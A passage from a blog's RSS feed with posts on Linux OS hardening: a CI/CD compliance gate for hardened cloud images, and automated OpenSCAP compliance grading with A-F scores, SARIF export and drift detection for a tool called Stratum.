<p>This is not a wall — it&#8217;s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.</p>
<hr />
<h2 id="runtime-gate-checking-existing-instances">Runtime Gate: Checking Existing Instances</h2>
<p>The Pipeline API also works against running instances, not just images:</p>
<pre><code class="" data-line=""># Gate on a running instance&#039;s current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H &quot;Authorization: Bearer ${STRATUM_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;instance_id&quot;: &quot;i-0abc123&quot;,
    &quot;min_grade&quot;: &quot;B&quot;,
    &quot;scan_type&quot;: &quot;runtime&quot;
  }&#039;
</code></pre>
<p>This is useful in deployment pipelines that don&#8217;t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.</p>
<p>It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.</p>
<hr />
<h2 id="grade-thresholds-by-environment">Grade Thresholds by Environment</h2>
<p>Not all environments need the same threshold. A common pattern:</p>
<pre><code class="" data-line=""># Environment-specific minimum grades
environments:
  production: A      # 95%+ passing — no exceptions
  staging:    B      # 85%+ passing — minor gaps acceptable
  development: C     # 70%+ passing — experimental OK
</code></pre>
<pre><code class="" data-line=""># Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d &#039;{&quot;image_id&quot;: &quot;ami-...&quot;, &quot;min_grade&quot;: &quot;A&quot;}&#039;

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d &#039;{&quot;image_id&quot;: &quot;ami-...&quot;, &quot;min_grade&quot;: &quot;B&quot;}&#039;
</code></pre>
<p>This lets development move fast with a lower bar while enforcing the highest standard at the production gate.</p>
<hr />
<h2 id="production-gotchas">Production Gotchas</h2>
<p><strong>Gate latency on first scan:</strong> If the image hasn&#8217;t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use <code class="" data-line="">stratum build --blueprint ... --scan-on-build</code> to ensure the scan runs during the build step and the result is cached for the gate call.</p>
<p><strong>Token rotation:</strong> The <code class="" data-line="">STRATUM_TOKEN</code> used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn&#8217;t bypass a production gate.</p>
<p><strong>Webhook notifications on gate failure:</strong> The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.</p>
<pre><code class="" data-line=""># In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: &quot;#platform-security&quot;
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures
</code></pre>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn&#8217;t deploy if it doesn&#8217;t pass</li>
<li><code class="" data-line="">POST /api/pipeline/scan</code> is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required</li>
<li>Failed gate output is actionable: every failing control includes the specific fix, not just the control ID</li>
<li>Runtime gates check instances after configuration, not just at image build time</li>
<li>Environment-specific thresholds let development move faster while enforcing the highest standard at production</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can&#8217;t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.</p>
<p>EP06 is the series closer. For five episodes, you&#8217;ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?</p>
<p>Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.</p>
<p><em>Next: <a href="/stratum-os-hardening-platform-open-source/">Stratum — open-source OS hardening platform for multi-cloud infrastructure</a></em></p>
<p>Get EP06 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&amp;linkname=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fhardened-image-cicd-pipeline-gate%2F&#038;title=The%20Pipeline%20Gate%20%E2%80%94%20Hardened%20Images%20as%20a%20CI%2FCD%20Build%20Constraint" data-a2a-url="https://linuxcent.com/hardened-image-cicd-pipeline-gate/" data-a2a-title="The Pipeline Gate — Hardened Images as a CI/CD Build Constraint"></a></p><p>The post <a href="https://linuxcent.com/hardened-image-cicd-pipeline-gate/">The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/hardened-image-cicd-pipeline-gate/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1831</post-id>	</item>
		<item>
		<title>Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</title>
		<link>https://linuxcent.com/automated-compliance-scanning-openscap/</link>
					<comments>https://linuxcent.com/automated-compliance-scanning-openscap/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 15 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[CIS]]></category>
		<category><![CDATA[Compliance]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[OpenSCAP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1828</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Automated OpenSCAP scanning with A-F compliance grades before deployment. SARIF export, drift detection, and compliance metadata baked into every AMI.</p>
<p>The post <a href="https://linuxcent.com/automated-compliance-scanning-openscap/">Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 4</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · </em><em>Automated OpenSCAP Compliance</em>**</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>&#8220;We use CIS L1&#8221; means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed</li>
<li>Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: <code class="" data-line="">cis-l1-A-98</code></li>
<li>Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides</li>
<li>SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM</li>
<li>Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built</li>
<li>An image that scores below your minimum grade threshold doesn&#8217;t get snapshotted — it doesn&#8217;t exist</li>
</ul>
<hr />
<h2 id="the-problem-a-grade-thats-never-been-verified-is-not-a-grade">The Problem: A Grade That&#8217;s Never Been Verified Is Not a Grade</h2>
<pre><code class="" data-line="">Security audit request:
&quot;Provide CIS L1 compliance evidence for all production instances&quot;

Team response:
  Instance A: &quot;CIS L1 hardened&quot; — OpenSCAP last run: 4 months ago
  Instance B: &quot;CIS L1 hardened&quot; — OpenSCAP last run: never
  Instance C: &quot;CIS L1 hardened&quot; — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: &quot;CIS L1 hardened&quot; — manual scan output: &quot;87% passing&quot;
  Instance E: &quot;CIS L1 hardened&quot; — manual scan output: &quot;91% passing&quot;

&quot;Which profile was used for D and E? Are they comparable?&quot;
&quot;Were they scanned before or after a recent kernel update?&quot;
&quot;Why is C running an old OpenSCAP version?&quot;
</code></pre>
<p>Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.</p>
<p>EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can&#8217;t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.</p>
<hr />
<p>A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.</p>
<p>The audit found four problems:<br />
1. Two instances had been scanned with CIS L1, not L2, despite being labeled &#8220;CIS L2&#8221;<br />
2. Three instances hadn&#8217;t been scanned in over six months<br />
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)<br />
4. Two instances showed &#8220;91% passing&#8221; and &#8220;89% passing&#8221; — with no documentation of whether those were acceptable thresholds or what the failing controls were</p>
<p>The audit took two weeks to resolve. The finding wasn&#8217;t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.</p>
<p>The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.</p>
<hr />
<h2 id="how-automated-openscap-compliance-works">How Automated OpenSCAP Compliance Works</h2>
<p>Every Stratum build ends with an automated OpenSCAP scan:</p>
<pre><code class="" data-line="">stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective, 98% pass rate)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    compliance_blueprint=ubuntu22-cis-l1.yaml@v1.2
      │
      └─ Snapshots AMI (or fails if grade &lt; min_grade)
</code></pre>
<p>The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.</p>
<hr />
<h2 id="the-a-f-grade-calculation">The A-F Grade Calculation</h2>
<p>The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:</p>
<pre><code class="" data-line="">Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A
</code></pre>
<p>Grade thresholds (configurable per blueprint):</p>
<table>
<thead>
<tr>
<th>Grade</th>
<th>Default threshold</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>A</td>
<td>≥ 95% effective</td>
<td>Production-ready, minimal exceptions</td>
</tr>
<tr>
<td>B</td>
<td>85–94%</td>
<td>Acceptable with documented exceptions</td>
</tr>
<tr>
<td>C</td>
<td>70–84%</td>
<td>Below standard — deploy with caution</td>
</tr>
<tr>
<td>D</td>
<td>55–69%</td>
<td>Significant gaps — do not deploy to production</td>
</tr>
<tr>
<td>F</td>
<td>&lt; 55%</td>
<td>Hardening failed — image not snapshotted</td>
</tr>
</tbody>
</table>
<p>The thresholds are configurable in the blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade &lt; B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55
</code></pre>
<p>If the build produces a grade below <code class="" data-line="">min_grade</code>, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.</p>
<hr />
<h2 id="reading-the-scan-output">Reading the Scan Output</h2>
<pre><code class="" data-line=""># Show the last build&#039;s scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy
</code></pre>
<p>The failing controls tell you exactly what to fix and how to fix it. This is the difference between &#8220;87% passing&#8221; as a number and &#8220;87% passing&#8221; as an actionable gap list.</p>
<hr />
<h2 id="sarif-export">SARIF Export</h2>
<p>Every scan produces a SARIF (Static Analysis Results Interchange Format) file:</p>
<pre><code class="" data-line=""># Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif
</code></pre>
<p>SARIF is the standard format for security scan results. It&#8217;s directly importable into:</p>
<ul>
<li><strong>GitHub Advanced Security</strong> — upload via <code class="" data-line="">actions/upload-sarif</code>, results appear in the Security tab</li>
<li><strong>Jira</strong> — import as security findings, linked to the image or instance ID</li>
<li><strong>Splunk / SIEM</strong> — structured JSON, parseable as events</li>
<li><strong>AWS Security Hub</strong> — importable as findings via the Security Hub API</li>
</ul>
<p>For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.</p>
<pre><code class="" data-line=""># Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref $GITHUB_REF \
  --github-sha $GITHUB_SHA
</code></pre>
<hr />
<h2 id="drift-detection">Drift Detection</h2>
<p>The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:</p>
<pre><code class="" data-line=""># Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)
</code></pre>
<p>Drift detection is how you find the instances that were &#8220;temporarily&#8221; modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.</p>
<hr />
<h2 id="scanning-without-a-build-assessing-existing-instances">Scanning Without a Build: Assessing Existing Instances</h2>
<p>For instances not built with Stratum, you can run a standalone scan:</p>
<pre><code class="" data-line=""># Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...
</code></pre>
<p>This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.</p>
<hr />
<h2 id="what-controls-typically-block-an-a-grade">What Controls Typically Block an A Grade</h2>
<p>For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:</p>
<table>
<thead>
<tr>
<th>Control</th>
<th>Why it often fails</th>
<th>Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.1.7 <code class="" data-line="">/var/log/audit</code> separate partition</td>
<td>Cloud images don&#8217;t have separate volumes at build time</td>
<td>Add EBS volume, configure at launch</td>
</tr>
<tr>
<td>1.6.1 AppArmor bootloader config</td>
<td>GRUB parameters not set correctly</td>
<td>Update <code class="" data-line="">/etc/default/grub</code>, run <code class="" data-line="">update-grub</code></td>
</tr>
<tr>
<td>3.1.1 Disable IPv6</td>
<td>Cloud networking sometimes requires IPv6</td>
<td>Override with documented reason if intentional</td>
</tr>
<tr>
<td>5.2.21 SSH MaxStartups</td>
<td>Default sshd_config not updated</td>
<td>Add <code class="" data-line="">MaxStartups 10:30:60</code> to sshd_config</td>
</tr>
<tr>
<td>6.1.10 World-writable files</td>
<td>Some package installations leave world-writable files</td>
<td>Post-install cleanup in Ansible role</td>
</tr>
</tbody>
</table>
<p>The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.</p>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it&#8217;s ever deployed</li>
<li>The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions</li>
<li>SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling</li>
<li>Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline</li>
<li>Images that score below <code class="" data-line="">min_grade</code> don&#8217;t get snapshotted — the failed build tells you exactly which controls to fix</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production &#8220;just this once.&#8221;</p>
<p>The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: <code class="" data-line="">POST /api/pipeline/scan</code> fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won&#8217;t let it through.</p>
<p><em>Next: <a href="/cicd-compliance-gate-hardened-images/">CI/CD compliance gate — block unhardened images before they reach production</a></em></p>
<p>Get EP05 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&#038;title=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" data-a2a-url="https://linuxcent.com/automated-compliance-scanning-openscap/" data-a2a-title="Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment"></a></p><p>The post <a href="https://linuxcent.com/automated-compliance-scanning-openscap/">Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/automated-compliance-scanning-openscap/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1828</post-id>	</item>
		<item>
		<title>bpftrace — Kernel Answers in One Line</title>
		<link>https://linuxcent.com/bpftrace-kernel-observability/</link>
					<comments>https://linuxcent.com/bpftrace-kernel-observability/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 10 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[bpftrace]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[Performance]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1839</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 8</span> <span class="rt-label rt-postfix">minutes</span></span>bpftrace gives you kernel observability in a one-liner. Trace syscalls, connections, and process spawns across any Kubernetes node — no app changes, no restart, no sampling.</p>
<p>The post <a href="https://linuxcent.com/bpftrace-kernel-observability/">bpftrace — Kernel Answers in One Line</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 8</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
